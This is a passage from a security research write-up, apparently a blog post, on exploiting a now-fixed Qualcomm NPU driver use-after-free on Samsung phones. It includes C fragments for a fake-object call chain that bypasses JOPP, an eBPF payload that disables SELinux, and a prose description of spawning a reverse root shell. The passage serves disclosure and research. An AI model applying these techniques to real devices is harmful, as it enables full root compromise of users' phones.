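wait_head[1] = fake_entry_list;   /* wait.head.prev */

/* The fake wait_queue_entry goes into the payload that reclaimed the
 * stats_buf; its flags/next fields must also be set so the wake-up
 * loop terminates cleanly (details omitted). stats_payload is the
 * userspace copy of that spray payload. */
uint64_t *fake_entry = (uint64_t *)(stats_payload + FAKE_ENTRY_OFF);
fake_entry[OFF_FUNC / 8] = target_func;   /* chosen below: ion_dma_buf_vunmap */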

As I already have the address of host_irq_wq from CVE-2021-1969, I can use it to obtain the address of any kernel function. However, I will not be able to set func to the address of an arbitrary ROP gadget. The Realtime Kernel Protection (RKP) of Samsung KNOX implements a form of control flow integrity (CFI) check that only allows a function call site to jump to the start of an actual function. This is called JOPP (jump-oriented programming prevention). Readers interested in the details can consult A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Bypasses by Dong-Hoon.

In order to gain arbitrary code execution, it would be good if I could use the __bpf_prog_run32 function that was used in An iOS hacker tries Android by Brandon Azad. As explained in that post, the function __bpf_prog_run32 can be used to invoke eBPF bytecode supplied through the second argument:

unsigned int __bpf_prog_run32(const void *ctx, const struct bpf_insn *insn)

… to gain arbitrary kernel code execution. However, since the eBPF bytecode to invoke is passed as the second argument (insn), I need control of the second argument to use this gadget, and here I only have control of the first argument (which points to the fake entry). So to use __bpf_prog_run32, I need another gadget that transfers control from the first argument to the second argument. Gadgets like this are actually not hard to find, as code like the following is common in the Linux kernel, especially in device driver code:

void foo(struct type_a* input) {
  struct type_b* priv = input->private;
  if (priv->ops->func) {
    priv->ops->func(priv, priv->some_field1, ...);
  }
}

One such example is ion_buffer_kmap_put (which is actually inlined, so its caller ion_dma_buf_vunmap is used in the actual exploit, but that’s a minor technical detail):

static void ion_buffer_kmap_put(struct ion_buffer *buffer)
{
    ...
	if (!buffer->kmap_cnt) {
		buffer->heap->ops->unmap_kernel(buffer->heap, buffer);   //<-------- 1.
		buffer->vaddr = NULL;
	}
}

With a fake buffer (the first argument) under my control, this gives me control of the function called at one above, as well as of both its first and second arguments. So by using ion_buffer_kmap_put as func in my fake entry and __bpf_prog_run32 as buffer->heap->ops->unmap_kernel in the fake buffer, I’ll be able to run arbitrary eBPF code. What’s more, because this code runs in a kworker, it runs as root:

root          17989      2       0      0 worker_th+          0 I [kworker/3:2]
root          17998      2       0      0 worker_th+          0 I [kworker/1:0]
root          17999      2       0      0 worker_th+          0 I [kworker/2:1]
root          18179      2       0      0 worker_th+          0 I [kworker/u16:2]
root          18212      2       0      0 worker_th+          0 I [kworker/0:2]

… so in contrast to common belief, it is actually possible to execute arbitrary kernel code as root on a Samsung device, and it even comes for free, although SELinux and seccomp restrictions still limit even the root user’s privileges.
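Putting the pieces together, the shape of the final chain of fake objects is roughly the following (a schematic; the real exploit overlaps these structures carefully inside the stats_buf, and all offsets are build-specific):

/* Schematic of the fake-object chain, all inside memory I control:
 *
 *   wake_up_interruptible(&fake_client->wait)
 *     curr = fake wait_queue_entry (in stats_buf)
 *     curr->func(curr, ...)                func = ion_dma_buf_vunmap (JOPP-legal)
 *       ion_buffer_kmap_put(buffer)        buffer derived from curr, also fake
 *         buffer->heap->ops->unmap_kernel(buffer->heap, buffer)
 *           == __bpf_prog_run32(buffer->heap, buffer)
 *              interprets eBPF instructions fetched via its second
 *              argument, i.e. from memory I control. */
uint64_t fake_entry_func   = ion_dma_buf_vunmap_addr; /* slid address */
uint64_t fake_unmap_kernel = bpf_prog_run32_addr;     /* slid address */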

Bypassing SELinux and popping a reverse root shell

When SELinux is enabled, it can run in either permissive mode or enforcing mode. In permissive mode, it only audits and logs unauthorized accesses but does not block them. The mode in which SELinux runs is controlled by the selinux_enforcing variable: if this variable is zero, SELinux runs in permissive mode. Normally, variables that are critical to the security of the system are protected by Kernel Data Protection (KDP) by marking them as read-only using the __kdp_ro or __rkp_ro attribute. This attribute indicates that the variable lives in a read-only page and that its modification is guarded by hypervisor calls. However, to my surprise, on the firmware that I tested, as well as in the source code of some S series devices, this variable does not seem to be protected:

//In security/selinux/hooks.c
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
static int selinux_enforcing_boot;
int selinux_enforcing;

The configuration CONFIG_SECURITY_SELINUX_DEVELOP is enabled on these devices. Judging from the kernel source code downloaded from Samsung, this seems to be the case for firmware as recent as June 2021 (from the S21 source code), although newer versions of the firmware have added protection for selinux_enforcing. In the source code corresponding to more recent firmware (G981USQS2DUH2/G981USQS2DUI1 for the S20, which is roughly the September update), the selinux_enforcing variable is marked as __kdp_ro:

//In security/selinux/hooks.c
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
#if (defined CONFIG_KDP_CRED && defined CONFIG_SAMSUNG_PRODUCT_SHIP)
static int selinux_enforcing_boot __kdp_ro;
int selinux_enforcing __kdp_ro;

… and is now protected by KNOX. However, as the main bug in this post was fixed in July 2021, on firmware vulnerable to it I can simply overwrite selinux_enforcing with zero to disable SELinux.
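As an illustration, the eBPF payload that flips selinux_enforcing to zero can be as short as this (a sketch; the BPF_* macros are the kernel’s own from include/linux/filter.h, redeclared in the exploit, and selinux_enforcing_addr is computed from the KASLR slide):

/* Sketch: run directly by the interpreter via __bpf_prog_run32, so no
 * verifier is involved and arbitrary memory stores are allowed. */
struct bpf_insn prog[] = {
	BPF_LD_IMM64(BPF_REG_1, selinux_enforcing_addr), /* r1 = &selinux_enforcing */
	BPF_ST_MEM(BPF_W, BPF_REG_1, 0, 0),              /* *(u32 *)r1 = 0: permissive */
	BPF_MOV64_IMM(BPF_REG_0, 0),                     /* return 0 */
	BPF_EXIT_INSN(),
};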

After SELinux is disabled, the call_usermodehelper function can be invoked via the kernel code execution primitive to spawn a reverse shell. As the code is called from the kworker, the shell will also have the root user ID. This, together with SELinux disabled, gives me full root privilege on the device.

The exploit can be found here with some setup notes.

Conclusions

In this post, I’ve looked at some vulnerabilities in Qualcomm’s NPU driver. While Samsung’s NPU driver and firmware are well researched, research on Qualcomm’s NPU remains sparse, even though it can be attacked directly from the untrusted app sandbox on many devices. The main bug used in this post is a use-after-free that results from a race between the NPU and the CPU, where the NPU accesses resources that the CPU has already released. This is a rather unconventional race condition in the kernel. As the usual techniques for preventing race conditions, such as mutexes, only apply when resources are shared within the same processor, extra care must be taken when handling resources shared between different processors. Another interesting feature of this bug is that, because the use-after-free is triggered from a kworker, it allows kernel code to be executed in the root context. Moreover, because the selinux_enforcing variable was not protected, I was able to disable SELinux as well. This is an interesting shortcut around the Kernel Data Protection (KDP) on Samsung devices, which is meant to prevent a process from overwriting its credentials to become root by protecting process credentials.

While it is not uncommon to have vulnerabilities in sufficiently complex codebases, and the vulnerabilities detailed in this post are not the most straightforward to spot, the existence of a bug like CVE-2021-1968, which would have been discovered, at the very least, as a functional bug just by running the relevant ioctl in async mode, suggests that the NPU driver is perhaps not very well tested. This, together with the long time it took for the vulnerabilities to be fixed (CVE-2021-1940 took about seven months for the fix to become public, and CVE-2021-1968 and CVE-2021-1969 both took about ten months; nor is this an isolated instance, as a previous use-after-free vulnerability, CVE-2019-10621, took about eight months to fix), is a very worrying sign. As Android relies heavily on application sandboxing, a long patch time for vulnerabilities increases the window in which vulnerabilities can co-exist and greatly reduces the effectiveness of application sandboxing. I’d suggest that original equipment manufacturers (OEMs) carefully review the use of the NPU driver and place appropriate restrictions on its access.